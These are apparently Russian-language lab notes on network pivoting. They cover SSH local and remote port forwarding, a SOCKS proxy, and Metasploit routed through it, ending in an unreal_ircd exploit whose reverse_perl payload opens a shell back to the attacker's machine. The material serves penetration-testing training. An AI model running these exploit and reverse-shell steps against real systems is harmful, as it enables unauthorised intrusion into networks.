###### tags: `Pivoting` # Пивотинг ![](https://i.imgur.com/EgH9Kzc.png) ![](https://i.imgur.com/9Dw10yF.png) ![](https://i.imgur.com/cVnYUel.png) ## SSH ![](https://i.imgur.com/EsXXLLH.png) kali: ssh -L 8080:10.0.0.2:80 test@10.0.2.15 Это значит что через test@10.0.2.15 у нас будет перенаправляться с 10.0.0.2:80 на наш локальный хост на порт 8080 ![](https://i.imgur.com/i6zIFYt.png) ## SSH remote port forwardng ![](https://i.imgur.com/k2r2D0o.png) На промежуточной машине (.15) открываем настройку /etc/ssh/sshd_config под рутом: в конец добавляем `GatewayPorts yes` Проверяем на наличие ошибок `sshd -t` `service ssh restart` `ssh -R 4444:0.0.0.0:4444 test@10.0.2.15` Перенаправляем на нашу кали с промежуточного хоста порт 4444. Чтобы не писать каждый раз код выше, Для удобства пропишем все данные в конфиге ~/.ssh/config ![](https://i.imgur.com/scFYWl2.png) Забросим ключи сразу ssh-copy-id linux ![](https://i.imgur.com/8YjASoI.png) Как видим, пробросили 3306 с 10.0.0.2 Вот вариант, с которого мы получили соединение до удаленной машины с нашей кали: ![](https://i.imgur.com/xHHMV7i.png) Откроем socks-proxy сервер на порту 5555 на linux: `ssh -D 5555 linux` msfconsole: use post/multi/manage/sudo search auxiliary/scanner/http/http_version ![](https://i.imgur.com/p3yKXa2.png) `set Proxies socks5:127.0.0.1:5555` Как мы видим, мы теперь просканили удаленную машину: ![](https://i.imgur.com/mOhNfSh.png) На удаленной машине у нас висит через ncat 4444 порт, на промежуточной у нас открыт редирект с 4444 на нашу кали + открыт socks5 прокси. msfconsole: ``` search unreal_ircd set rhost 10.0.0.2 set lhost 10.0.0.1 set lport 4444 set Proxies socks5:127.0.0.1:5555 set payload cmd/unix/reverse_perl set verbose true set ReverseAllowProxy true ``` Как видим, мы даже смогли удаленно получить бекдор: ![](https://i.imgur.com/PrefY1t.png) ![](https://i.imgur.com/uV9eGQR.png)